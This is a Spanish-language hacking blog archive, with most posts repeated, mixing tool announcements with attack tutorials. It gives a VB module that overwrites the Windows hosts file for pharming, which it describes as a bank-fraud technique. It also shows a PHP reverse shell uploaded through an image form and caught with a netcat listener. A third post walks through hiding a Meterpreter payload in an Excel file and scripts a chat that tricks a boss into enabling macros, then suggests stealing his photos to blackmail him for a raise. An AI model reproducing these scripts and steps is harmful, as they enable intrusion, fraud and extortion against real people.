Backup Oficial de SeguridadBlanca.Org

Mostrando entradas con la etiqueta Tool. Mostrar todas las entradas
Mostrando entradas con la etiqueta Tool. Mostrar todas las entradas

viernes, 8 de enero de 2010

Hosts Poisoning T00l

Antes que todo quería pedir disculpas por escribir tan poco pero ando en época de examenes y pues no tengo tiempo de escribir pero ahora le quiero dar unos minutitos al blog para enseñarles esta t00l tan curiosa que he encontrado...


Dando Vueltas por blogs de malware y troyanos en general, lógico solo para mantenerme actualizado, di con que en Professional Hacker han puesto un módulo con el cual se puede hacer hosts poisoning, que quiero decir con hosts poisoning, ya hemos hablado antes sobre el pharming y esto es pharming, lo que hacemos es modificar el archivo /etc/hosts para que crean que al entrar en una página está todo bien sin embargo están navegando en un fake pero en el browser dice que están en la página real...


Esta técnica se usa para la estafa, la mayoría de veces para robo de cuentas bancarias, esta técnica como antes mencionado se llama pharming, ahora si, aquí podemos ver el ejemplo de un programa que usa lo mas común que es un bat pero lo que les voy a presentar es un módulo que he estado analizando y al parecer funciona a la perfección, lo digo por que los batch para hacer esta función en windows 7 y vista no funcionan bien, por eso el módulo que les daré es tan importante, tiene para hacerlo a windows 7 y windows vista.


el módulo solo te facilita el poder escribir ek módulo pero te da la opción de que hagas un programita con mas funciones...


El Code:


'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
''''''''''''''''''' HOSTS POISONING MODULE BY XA0S '''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Creado por Xa0s '
' www.professional-hacker.org '
' Modulo encargado de editar el archivo Hosts de Windows '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Public Function hosts(insertar As String, windows As String) As String
Dim w2 As String
If windows = 95 Then
w2 = "C:\Windows\hosts"
Else
If windows = 98 Then
w2 = "C:\Windows\hosts"
Else
If windows = "Me" Then
w2 = "C:\Windows\hosts"
Else
If windows = "NT" Then
w2 = "C:\WINNT\System32\drivers\etc\hosts"
Else
If windows = 2000 Then
w2 = "C:\WINNT\System32\drivers\etc\hosts"
Else
If windows = "XP" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = 2003 Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = "Vista" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
If windows = "7" Then
w2 = "C:\Windows\System32\drivers\etc\hosts"
Else
MsgBox "Error de Sistema Operativo", vbCritical, "Hosts Poisoning Module By Xa0s"
Exit Function
End If
End If
End If
End If
End If
End If
End If
End If
End If
Open w2 For Output As #1
Print #1, "// Hosts Poisoning Module By Xa0s //"
Print #1, insertar
Close #1
End Function

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''' MODO DE USO ''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' call hosts(AQUI LO QUE QUIERAS ESCRIBIR EN EL HOSTS, SISTEMA OPERATIVO) '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' El sistema operativo puede ser: '
'--- 95, 98, ME, 2000, NT, 2003, XP, VISTA, 7 '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''



en el mismo código se especifica mucho...


espero esto les sirva por que yo se los doy con esta idea pero ustedes pueden usarlo para escribir otros archivos, uno nunca sabe algo como esto le pueda servir.


PD: el código no se ve todo pero solo hagan copy paste de lo que se supone está y luego peguenlo en un bloc de notas o en el ide de visual y ya, les saldrá el código mas grande que es el real.

Saludos
Dr.White

miércoles, 23 de diciembre de 2009

Metaspl0it 3.3.3 Actualizemos!!!



Como muchos yo uso el metaspl0it, la mayoría creo que lo sabe... y hoy hace unas horas ha salido la nueva versión 3.3.3 con algunas cosas que le dan una mejor perspectiva a lo que es metaspl0it, el expl0it ranking es lo mejorcito que he visto...


Sin mas que decirles les voy a dejar la descarga:

http://www.metasploit.com/framework/download/



también podemos actualizar nuestro metaspl0it... actualizamos con el msfupdate... mm bueno para que puedan ver los nuevos features que nos trae nuestro queridisimo metaspl0it entonces se los dejo aquí:


click aquí para verlo


Espero les guste yo lo estoy probando en windows y en un rato me lo descargo para testearlo en Linux...



Saludos
Dr.White

Metaspl0it 3.3.3 Actualizemos!!!



Como muchos yo uso el metaspl0it, la mayoría creo que lo sabe... y hoy hace unas horas ha salido la nueva versión 3.3.3 con algunas cosas que le dan una mejor perspectiva a lo que es metaspl0it, el expl0it ranking es lo mejorcito que he visto...


Sin mas que decirles les voy a dejar la descarga:

http://www.metasploit.com/framework/download/



también podemos actualizar nuestro metaspl0it... actualizamos con el msfupdate... mm bueno para que puedan ver los nuevos features que nos trae nuestro queridisimo metaspl0it entonces se los dejo aquí:


click aquí para verlo


Espero les guste yo lo estoy probando en windows y en un rato me lo descargo para testearlo en Linux...



Saludos
Dr.White

jueves, 17 de diciembre de 2009

PenTest Reverse Shell con PHP y NETCAT

La mayoría de los que andan en el hacking, la seguridad informatica y/o la rama de la informática seguramente alguna ves ha escuchado del NMAP, el nmap viene en un paquete con otra herramienta, excelente herramienta para conexiones remotas, se llama NetCat, el netcat nos ayuda en muchas cosillas, entre ellas está el ver headers, hacer conexiones remotas, poner en escucha servidores y sinceramente es una t00l que se necesita en el pen-test...


Bueno ahora lo que yo les voy a enseñar es como manejar a traves del netcat manejar el code y al mismo tiempo no usar shells como la R57 o C99 mmm bueno aquí les cuento como haremos...



lo primero que debemos hacer es ganar acceso al host, es decir debemos hacer la intrusión... mm nos bastará con encontrar un upload de imagenes bypasseable o lo que ustedes quieran o encuentren entonces vamos a subir a http://www.h4x0r.com/ a atraves de un upload de imagenes un archivo .php


http://www.h4x0r.com/upload.php?user=dedalo

despues de que hemos subido entonces nos dará que la ruta de nuestro archivo .php es:


http://www.h4x0r.com/upload/data/users/dedalo/shell.php


Como se han dado cuenta ya sabemos la ruta de nuestro archivo.php creo que hasta aquí hay dos preguntas que seguro alguno de ustedes se hará... la primera es como encontrar el archivo... pues es menos compleja de lo que se imaginan la respuesta... la ruta del archivo la sabremos gracias a que muchas veces nos dicen donde esta alojado el archivo por medio de links o pistas que podemos seguir o en otros casos podemos usar nuestro Addon Live Http Headers para ver por donde fue...


La otra pregunta se las puedo responder también, creo que es... la mas importante, que hay dentro del archivo .php... pues bueno dentro del archivo PHP debe haber un código como este:


<?php



/*para esto podemos usar fputs o fwrite*/



set_time_limit(0);



$msgin = "SeguridadBlanca Remote Shell";

$sock = fsockopen("IP", 6666);



fputs($sock, $msgin);



while(1){

$back = fgets($sock, 6666);



  if($back){

    $sys = system($back);

    fputs($sock, "$sys\n\n");

  }

}

// By Dedalo From SeguridadBlanca

?>



que pueden encontrar en pastebin también dando click aquí


como ven ese código es muy importante ya que es el que nos permitirá hacer la conexión a traves del puerto 6666, elejí ese por un random no es que siempre lo tienen que usar ustedes pueden escojer... ahora ya tenemos el archivo en el host... a hacer la conexión...no... aun falta algo que es fundamental... el PHP es un lenguaje que debe interpreta el Servidor como lo puede ser el APACHE que es el que normalmente se usa, en este caso como el servidor debe interpretarlo debemos acceder a el por eso debemos tener la ruta al archivo...previo a hacer la conexion debemos acceder a nuestro archivo que en este caso sería llendo a...

http://www.h4x0r.com/upload/data/users/dedalo/shell.php

cuando nosotros ingresemso el servidor lo interpretará y automaticamente si el servidor tiene fallos de seguridad interesantes no habrá problema en hacer algo como esto...


Ahora si la parte del NETCAT... es la forma con la que haremos la conexión... el programa está diseñado para que podamos acceder a ejecutar comandos del servidor segun el usuario que normalmente es APACHE pero podemos escalar privilegios segun las actualizaciones y un millon de factores pero por ahora haremos algo simple...


Descarguen el NETCAT Dando click aquí o si tienen el NMAP completo deberian tener por ahí un archivo llamado NC...


ahora abrimos nuestra consola vamos hasta la carpeta del netcat y vamos a hacer conexion...

como la conexion es inversa osea Reverse Conection o Reverse Shell cuando accedamos a la web recien haremos conexión como dije de manera previa...

con el nc nos pondremos en escucha con la siguiente sintaxis...

ncat -v -l -p 6666

ahora si ya tenemos en escucha y ahora si den click en go su navegador con la url:

http://www.h4x0r.com/upload/data/users/dedalo/shell.php


ahora deben ver como su consola le dice que se han conectado a ustedes... ya podemos hacer cosas como wget y alguna que otra... esto no solo les sirve para hacer cosas malas sino en caso de soporte y otro tipo de cosas... es un poco riesgoso hacer este tipo de cosas tanto para ustedes como para la web asi que no lo recomiento...


espero haya estado claro el tutorial...


Dudas?

Saludos
Dr.White

PenTest Reverse Shell con PHP y NETCAT

La mayoría de los que andan en el hacking, la seguridad informatica y/o la rama de la informática seguramente alguna ves ha escuchado del NMAP, el nmap viene en un paquete con otra herramienta, excelente herramienta para conexiones remotas, se llama NetCat, el netcat nos ayuda en muchas cosillas, entre ellas está el ver headers, hacer conexiones remotas, poner en escucha servidores y sinceramente es una t00l que se necesita en el pen-test...


Bueno ahora lo que yo les voy a enseñar es como manejar a traves del netcat manejar el code y al mismo tiempo no usar shells como la R57 o C99 mmm bueno aquí les cuento como haremos...



lo primero que debemos hacer es ganar acceso al host, es decir debemos hacer la intrusión... mm nos bastará con encontrar un upload de imagenes bypasseable o lo que ustedes quieran o encuentren entonces vamos a subir a http://www.h4x0r.com/ a atraves de un upload de imagenes un archivo .php


http://www.h4x0r.com/upload.php?user=dedalo

despues de que hemos subido entonces nos dará que la ruta de nuestro archivo .php es:


http://www.h4x0r.com/upload/data/users/dedalo/shell.php


Como se han dado cuenta ya sabemos la ruta de nuestro archivo.php creo que hasta aquí hay dos preguntas que seguro alguno de ustedes se hará... la primera es como encontrar el archivo... pues es menos compleja de lo que se imaginan la respuesta... la ruta del archivo la sabremos gracias a que muchas veces nos dicen donde esta alojado el archivo por medio de links o pistas que podemos seguir o en otros casos podemos usar nuestro Addon Live Http Headers para ver por donde fue...


La otra pregunta se las puedo responder también, creo que es... la mas importante, que hay dentro del archivo .php... pues bueno dentro del archivo PHP debe haber un código como este:


<?php



/*para esto podemos usar fputs o fwrite*/



set_time_limit(0);



$msgin = "SeguridadBlanca Remote Shell";

$sock = fsockopen("IP", 6666);



fputs($sock, $msgin);



while(1){

$back = fgets($sock, 6666);



  if($back){

    $sys = system($back);

    fputs($sock, "$sys\n\n");

  }

}

// By Dedalo From SeguridadBlanca

?>



que pueden encontrar en pastebin también dando click aquí


como ven ese código es muy importante ya que es el que nos permitirá hacer la conexión a traves del puerto 6666, elejí ese por un random no es que siempre lo tienen que usar ustedes pueden escojer... ahora ya tenemos el archivo en el host... a hacer la conexión...no... aun falta algo que es fundamental... el PHP es un lenguaje que debe interpreta el Servidor como lo puede ser el APACHE que es el que normalmente se usa, en este caso como el servidor debe interpretarlo debemos acceder a el por eso debemos tener la ruta al archivo...previo a hacer la conexion debemos acceder a nuestro archivo que en este caso sería llendo a...

http://www.h4x0r.com/upload/data/users/dedalo/shell.php

cuando nosotros ingresemso el servidor lo interpretará y automaticamente si el servidor tiene fallos de seguridad interesantes no habrá problema en hacer algo como esto...


Ahora si la parte del NETCAT... es la forma con la que haremos la conexión... el programa está diseñado para que podamos acceder a ejecutar comandos del servidor segun el usuario que normalmente es APACHE pero podemos escalar privilegios segun las actualizaciones y un millon de factores pero por ahora haremos algo simple...


Descarguen el NETCAT Dando click aquí o si tienen el NMAP completo deberian tener por ahí un archivo llamado NC...


ahora abrimos nuestra consola vamos hasta la carpeta del netcat y vamos a hacer conexion...

como la conexion es inversa osea Reverse Conection o Reverse Shell cuando accedamos a la web recien haremos conexión como dije de manera previa...

con el nc nos pondremos en escucha con la siguiente sintaxis...

ncat -v -l -p 6666

ahora si ya tenemos en escucha y ahora si den click en go su navegador con la url:

http://www.h4x0r.com/upload/data/users/dedalo/shell.php


ahora deben ver como su consola le dice que se han conectado a ustedes... ya podemos hacer cosas como wget y alguna que otra... esto no solo les sirve para hacer cosas malas sino en caso de soporte y otro tipo de cosas... es un poco riesgoso hacer este tipo de cosas tanto para ustedes como para la web asi que no lo recomiento...


espero haya estado claro el tutorial...


Dudas?

Saludos
Dr.White

viernes, 11 de diciembre de 2009

Metaspl0it 3.3.2 Actualizemos!!!

Actualizando la base de datos y algo en el código asumo, han sacado una nueva versión de metaspl0it. recien me estoy actualizando hoy ya que ayer no tube tiempo de entrar en la compu para hacer nada...





yo aun estoy leyendo los cambios que se han hecho por eso inferí al principio de esta entrada sin e,bargo aquí les dejo el link para que vean que cosa se actualizo...


bueno como ya es verdad que hay release entonces les dejo el link de la web de metaspl0it y la descarga...


link a la web---> click aquí

Link a la descarga--> click aquí


Saludos
Dr.White

Metaspl0it 3.3.2 Actualizemos!!!

Actualizando la base de datos y algo en el código asumo, han sacado una nueva versión de metaspl0it. recien me estoy actualizando hoy ya que ayer no tube tiempo de entrar en la compu para hacer nada...





yo aun estoy leyendo los cambios que se han hecho por eso inferí al principio de esta entrada sin e,bargo aquí les dejo el link para que vean que cosa se actualizo...


bueno como ya es verdad que hay release entonces les dejo el link de la web de metaspl0it y la descarga...


link a la web---> click aquí

Link a la descarga--> click aquí


Saludos
Dr.White

lunes, 30 de noviembre de 2009

XLSinjector - Inyectar Consola Meterpreter en .xls

Pasandome por DragonJAR como de costumbre di con que habían escrito sobre esta t00l el XlsInjector, Hoy mismo la iva a probar con un amigo pero me dijo que no en el colegio así que decidi probarlo con otro amigo.

Lo acabo de terminar de probar, tuve algunos problemitas al principio pero era por que no recordaba algo, ahora ya lo probe y esta bueno... primero necesitamos nuestro queridisimo metaspl0it:

click Aquí para descargar

Bueno ya lo tenemos ahora a descargar el XlsInjector =)

click aquí para descargarlo

Ahora si les voy a explicar básicamente como funciona esto.

este archivo programado en Perl lo que hace es poner una consola meterpreter en un archivo de Excel cualquiera. para esto necesitamos un modulo perl el win32:OLE que podemos descargar desde aquí ahora una ves que lo tenemos lo que hace básicamente el programa es abrir una conexion remota por el puerto 4444 entonces ya el resto es fácil.

una ves que la victima haya sido "Infectada" podremos hacerle la conexion remota con el Metaspl0it =) bien,, viene la parte divertida...


una ves que el archivo ya esta abierto (ojo solo cuando el archivo esta abierto podemos hacer conexion ya que esto corre en la ram (no genera procesos))

Para usar la t00l lo primero que harmeos será usar algo como esto:

perl xlsinjector.pl -i credito2009.xls -o credito2009infected.xls

listo ahora ya tenemos nuestro XLS malicioso... ahora nosotoros tenemos que usar un poco de ingeniría social aquí, o encontrar una manera de poner las macros del excel en bajo (confiar en proyectos de Visual), esto lo tendremos que hacer con algo como lo siguiente:

Jefe dice:
* Dedalo mandame ya los creditos del 2009
Dedalo dice:
* Claro jefe ahí le va...
-------------
tranferencia de credito2009infected.xls ha sido exitosa
-------------
Jefe dice:
* muchas gracias Dedalo
Dedalo dice:
* Espere jefe para que funcione debe de bajar los macros ya que use un modulo de visual basic para que el archivo tenga una mejor distribución así el peso sería menor y de esa manera tambien podrá sacar unos promedios mas rápidos y todo se ejecutará ademas los creditos con una formula extensa dejan sin ram la PC y eso nos costaría tiempo y espacio. para poner los macros en confiable debe de...
Jefe dice:
* Bueno dedalo el de sistemas eres tu yo te obedesco... nomas cuidado con malograrme el PC que tengo fotos PORNO con la mujer que me cojo y no es mi esposa jaja dedalo tu sabes como somos nosotros...
Dedalo dice:
* ok Jefe no se preocupe.

Ahora como ven convencimos al Jefe Atarantandolo con cosas que el no entiendo y con un lexico en el cual el es limitado, cuando obtengamos las fotos del jefe se las mostraremos a la mujer.


Ahora fácil el ya tiene abierto el Excel lo está mirando y ya casi todo está listo ahora abriremos nuestro metaspl0it y a Vulnerar se ha dicho.

Abrimos nuestro metaspl0it y ponemos:

Use multi/handler

luego que se ponga para usarlo vamos a poner:

set payload windows/meterpreter/bind_tcp

una ves puesto pondremos:

set RHOST ipdemaquinaconxls

una ves ya puesto pondremos

set RPORT 4444

luego hay que poner el comando mágico de metaspl0it =)

EXPLOIT


Listo ya lo hemos explotado si todo sale bien entonces ahora deberiamos tener acceso a la PC de nuestro JEFE... ahora podremos usar los comandos de una consola meterpreter... yo les facilito unos obtenidos de DragonJAR.org:

Es lo mismo que obtendriamos con el "?" pero se los facilito igual...

Core Commands
=============

Command Description
——- ———–
? Help menu
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rmdir Remove directory
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
——- ———–
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
——- ———–
execute Execute a command
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shutdown Shuts down the remote computer
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
——- ———–
idletime Returns the number of seconds the remote user has been idle
uictl Control some of the user interface components

Priv: Password database Commands
================================

Command Description
——- ———–
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
——- ———–
timestomp Manipulate file MACE attributes


Listo con esto ya estan preparados para hacer este ataque y pedir un aumento por chantaje a su jefe BOCON... un consejo que les puedo dar es leerse este PDF para que pueda ver mas utilidades para la consola meterpreter... usen migrate para que se vuelva un proceso y no esten superditados a que el jefe tenga abierto el .xls

Ahora si concluyo =)
-----
Happy Hacking
-----

referencias: Dragonjar.org

Saludos
Dr.White

XLSinjector - Inyectar Consola Meterpreter en .xls

Pasandome por DragonJAR como de costumbre di con que habían escrito sobre esta t00l el XlsInjector, Hoy mismo la iva a probar con un amigo pero me dijo que no en el colegio así que decidi probarlo con otro amigo.

Lo acabo de terminar de probar, tuve algunos problemitas al principio pero era por que no recordaba algo, ahora ya lo probe y esta bueno... primero necesitamos nuestro queridisimo metaspl0it:

click Aquí para descargar

Bueno ya lo tenemos ahora a descargar el XlsInjector =)

click aquí para descargarlo

Ahora si les voy a explicar básicamente como funciona esto.

este archivo programado en Perl lo que hace es poner una consola meterpreter en un archivo de Excel cualquiera. para esto necesitamos un modulo perl el win32:OLE que podemos descargar desde aquí ahora una ves que lo tenemos lo que hace básicamente el programa es abrir una conexion remota por el puerto 4444 entonces ya el resto es fácil.

una ves que la victima haya sido "Infectada" podremos hacerle la conexion remota con el Metaspl0it =) bien,, viene la parte divertida...


una ves que el archivo ya esta abierto (ojo solo cuando el archivo esta abierto podemos hacer conexion ya que esto corre en la ram (no genera procesos))

Para usar la t00l lo primero que harmeos será usar algo como esto:

perl xlsinjector.pl -i credito2009.xls -o credito2009infected.xls

listo ahora ya tenemos nuestro XLS malicioso... ahora nosotoros tenemos que usar un poco de ingeniría social aquí, o encontrar una manera de poner las macros del excel en bajo (confiar en proyectos de Visual), esto lo tendremos que hacer con algo como lo siguiente:

Jefe dice:
* Dedalo mandame ya los creditos del 2009
Dedalo dice:
* Claro jefe ahí le va...
-------------
tranferencia de credito2009infected.xls ha sido exitosa
-------------
Jefe dice:
* muchas gracias Dedalo
Dedalo dice:
* Espere jefe para que funcione debe de bajar los macros ya que use un modulo de visual basic para que el archivo tenga una mejor distribución así el peso sería menor y de esa manera tambien podrá sacar unos promedios mas rápidos y todo se ejecutará ademas los creditos con una formula extensa dejan sin ram la PC y eso nos costaría tiempo y espacio. para poner los macros en confiable debe de...
Jefe dice:
* Bueno dedalo el de sistemas eres tu yo te obedesco... nomas cuidado con malograrme el PC que tengo fotos PORNO con la mujer que me cojo y no es mi esposa jaja dedalo tu sabes como somos nosotros...
Dedalo dice:
* ok Jefe no se preocupe.

Ahora como ven convencimos al Jefe Atarantandolo con cosas que el no entiendo y con un lexico en el cual el es limitado, cuando obtengamos las fotos del jefe se las mostraremos a la mujer.


Ahora fácil el ya tiene abierto el Excel lo está mirando y ya casi todo está listo ahora abriremos nuestro metaspl0it y a Vulnerar se ha dicho.

Abrimos nuestro metaspl0it y ponemos:

Use multi/handler

luego que se ponga para usarlo vamos a poner:

set payload windows/meterpreter/bind_tcp

una ves puesto pondremos:

set RHOST ipdemaquinaconxls

una ves ya puesto pondremos

set RPORT 4444

luego hay que poner el comando mágico de metaspl0it =)

EXPLOIT


Listo ya lo hemos explotado si todo sale bien entonces ahora deberiamos tener acceso a la PC de nuestro JEFE... ahora podremos usar los comandos de una consola meterpreter... yo les facilito unos obtenidos de DragonJAR.org:

Es lo mismo que obtendriamos con el "?" pero se los facilito igual...

Core Commands
=============

Command Description
——- ———–
? Help menu
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rmdir Remove directory
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
——- ———–
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
——- ———–
execute Execute a command
getpid Get the current process identifier
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shutdown Shuts down the remote computer
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
——- ———–
idletime Returns the number of seconds the remote user has been idle
uictl Control some of the user interface components

Priv: Password database Commands
================================

Command Description
——- ———–
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
——- ———–
timestomp Manipulate file MACE attributes


Listo con esto ya estan preparados para hacer este ataque y pedir un aumento por chantaje a su jefe BOCON... un consejo que les puedo dar es leerse este PDF para que pueda ver mas utilidades para la consola meterpreter... usen migrate para que se vuelva un proceso y no esten superditados a que el jefe tenga abierto el .xls

Ahora si concluyo =)
-----
Happy Hacking
-----

referencias: Dragonjar.org

Saludos
Dr.White

jueves, 26 de noviembre de 2009

Katana - Multiples Distros en tu USB

Los PenTesters muchas veces necesitamos ir a un lugar rápido y nuestra laptop está descargando algo entonces llegamos con un pendrive con un nubuntu y quiere que creemos un access point falso para monitorear a la gente del trabajo... entonces nosotros no sabemos como hacerlo con nubuntu, que mejor la ocación para tener en un pendrive o dispositivo USB muchas distros, justo en ese momento tener un Slax... no es tentador tener muchas en un mismo pendrive?... por eso les voy a mostrar esto... se llama Katana y nos permite bootear varias distros en un mismo USB...


Katana ha sacado su versión 1.0 en la cual estan la siguientes distribuciones:

* Backtrack 3
* Backtrack 4 beta
* the Ultimate Boot CD
* Organizational Systems Wireless Auditor (OSWA) Assistiant
* Slax 6
* Ophcrack XP
* Ophcrack Vista
* Damn Small Linux
* Damn Vulnerable Linux
================================

Espero les sirva para todos aquellos que siempre necesitamos estar en uno o en otro S.O o Distro...


PD: Perdí mi Pendrive con KATANA Recien estoy descargando de nuevo aquí les comparto la descarga...


Click Aquí para descargar

Web Oficial click aquí


Creador: .ronin ---> hackfromacave[dot]com



Saludos
Dr.White

Katana - Multiples Distros en tu USB

Los PenTesters muchas veces necesitamos ir a un lugar rápido y nuestra laptop está descargando algo entonces llegamos con un pendrive con un nubuntu y quiere que creemos un access point falso para monitorear a la gente del trabajo... entonces nosotros no sabemos como hacerlo con nubuntu, que mejor la ocación para tener en un pendrive o dispositivo USB muchas distros, justo en ese momento tener un Slax... no es tentador tener muchas en un mismo pendrive?... por eso les voy a mostrar esto... se llama Katana y nos permite bootear varias distros en un mismo USB...


Katana ha sacado su versión 1.0 en la cual estan la siguientes distribuciones:

* Backtrack 3
* Backtrack 4 beta
* the Ultimate Boot CD
* Organizational Systems Wireless Auditor (OSWA) Assistiant
* Slax 6
* Ophcrack XP
* Ophcrack Vista
* Damn Small Linux
* Damn Vulnerable Linux
================================

Espero les sirva para todos aquellos que siempre necesitamos estar en uno o en otro S.O o Distro...


PD: Perdí mi Pendrive con KATANA Recien estoy descargando de nuevo aquí les comparto la descarga...


Click Aquí para descargar

Web Oficial click aquí


Creador: .ronin ---> hackfromacave[dot]com



Saludos
Dr.White

jueves, 19 de noviembre de 2009

WinDump

Creo que todos alguna ves hemos escuchado del TCPDUMP, en el Simposio Internacional de Redes y comunicaciones de datos los de JackSecurity dieron una muy interesante charla sobre el TCP dump y su trabajo como sniffer y su habilidad para con packetes de la red poder ejecutar un Denial Of Service hacia una computadora de la red.


el WinDump es una versión del Sniffer para Windows, la necesidad me ha llevado a encontrar muchas buenas herramientas para windows y gratis, esta herramienta te permite ver los movimientos que hace tu red, sirve como t00l de administración también.


Esta utilidad necesida de otra para su funcionamiento, el WINPCAP, este es una especie de instalador para un propio funcionamiento del WINDUMP y/o TCPDUMP, masomenos son como requerimientos uno del otro.


Si desean probar la utilidad pues bienvenido.


Link de la web: http://www.winpcap.org

Link de Descarga del WINPCAP: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe

Link de Descarga del WINDUMP 3.9.5 (actual): http://www.winpcap.org/windump/install/bin/windump_3_9_5/WinDump.exe



No lo olviden para usar el WINDUMP necesitan el WINPCAP, espero les guste el programita recien estoy buscando manuales pero parece muy bueno, lo he probado en la red de un lugar ************** y funciona bien...


Saludos
Dr.White

WinDump

Creo que todos alguna ves hemos escuchado del TCPDUMP, en el Simposio Internacional de Redes y comunicaciones de datos los de JackSecurity dieron una muy interesante charla sobre el TCP dump y su trabajo como sniffer y su habilidad para con packetes de la red poder ejecutar un Denial Of Service hacia una computadora de la red.


el WinDump es una versión del Sniffer para Windows, la necesidad me ha llevado a encontrar muchas buenas herramientas para windows y gratis, esta herramienta te permite ver los movimientos que hace tu red, sirve como t00l de administración también.


Esta utilidad necesida de otra para su funcionamiento, el WINPCAP, este es una especie de instalador para un propio funcionamiento del WINDUMP y/o TCPDUMP, masomenos son como requerimientos uno del otro.


Si desean probar la utilidad pues bienvenido.


Link de la web: http://www.winpcap.org

Link de Descarga del WINPCAP: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe

Link de Descarga del WINDUMP 3.9.5 (actual): http://www.winpcap.org/windump/install/bin/windump_3_9_5/WinDump.exe



No lo olviden para usar el WINDUMP necesitan el WINPCAP, espero les guste el programita recien estoy buscando manuales pero parece muy bueno, lo he probado en la red de un lugar ************** y funciona bien...


Saludos
Dr.White

miércoles, 18 de noviembre de 2009

Metaspl0it 3.3 Actualizemos!!!

El Software de explotación de vulnerabilidades mas famoso del mundo ah Actualizado...


Despues de casi 1 año de estarlo programando la descarga ya está libre para ambos sistemas operativos Linux & Windows...


Link de Descarga


La entrada oficial en el blog de metaspl0it

Espero les guste yo ya lo tengo en mi pc tiene muchos expl0its nuevos en su base de datos...

Saludos
Dr.White

Metaspl0it 3.3 Actualizemos!!!

El Software de explotación de vulnerabilidades mas famoso del mundo ah Actualizado...


Despues de casi 1 año de estarlo programando la descarga ya está libre para ambos sistemas operativos Linux & Windows...


Link de Descarga


La entrada oficial en el blog de metaspl0it

Espero les guste yo ya lo tengo en mi pc tiene muchos expl0its nuevos en su base de datos...

Saludos
Dr.White

martes, 27 de octubre de 2009

WaRvox PenTest your Voip

WaRvox es una herramienta de auditoría de seguridad en VOIP y otros sistemas de Telefonía, Para usar este producto no se necesita un hardware de VOIP solo necesitas el software para el analisis del funcionamiento y desenvolvimiento de las llamadas que se realizan.

Este software ha sido diseñado para un buen funcionamiento en sistemas linux, esta Aplicación se puede obtener del repertorio de metasploit...

http://metasploit.com/svn/warvox/trunk/

Lógicamente se puede obtener de la página principal para no obviar algunas actualizaciones que quizas metaspl0it puede pasar por alto...

Descargar la 1.0.1:

Click aquí

esta aplicacion se usa desde el navegador, hay que configurarla y compilarla pero su funcionamiento es simple y rápido debido a su code y GUI.

Aquí podemos ver una de las imagenes de como es la interfaz de uso...





La imagen menciona el puerto 45555 sin embargo por default se instala en el 777,

espero les guste esta APP no quiero mentirles aun no la pruebo bien pero me la recomendo mucho un amigo en el cual confio ya que siempre me da buenas APPs...

Click aquí para ir a la web oficial

Saludos
Dr.White

WaRvox PenTest your Voip

WaRvox es una herramienta de auditoría de seguridad en VOIP y otros sistemas de Telefonía, Para usar este producto no se necesita un hardware de VOIP solo necesitas el software para el analisis del funcionamiento y desenvolvimiento de las llamadas que se realizan.

Este software ha sido diseñado para un buen funcionamiento en sistemas linux, esta Aplicación se puede obtener del repertorio de metasploit...

http://metasploit.com/svn/warvox/trunk/

Lógicamente se puede obtener de la página principal para no obviar algunas actualizaciones que quizas metaspl0it puede pasar por alto...

Descargar la 1.0.1:

Click aquí

esta aplicacion se usa desde el navegador, hay que configurarla y compilarla pero su funcionamiento es simple y rápido debido a su code y GUI.

Aquí podemos ver una de las imagenes de como es la interfaz de uso...





La imagen menciona el puerto 45555 sin embargo por default se instala en el 777,

espero les guste esta APP no quiero mentirles aun no la pruebo bien pero me la recomendo mucho un amigo en el cual confio ya que siempre me da buenas APPs...

Click aquí para ir a la web oficial

Saludos
Dr.White

lunes, 26 de octubre de 2009

PwnTooth - Pentesting Bluetooth


Eexcelente Herramienta para hacerle pen-test a un dispositivos bluetooth, hoy lo he probado y funciona de maravilla =)

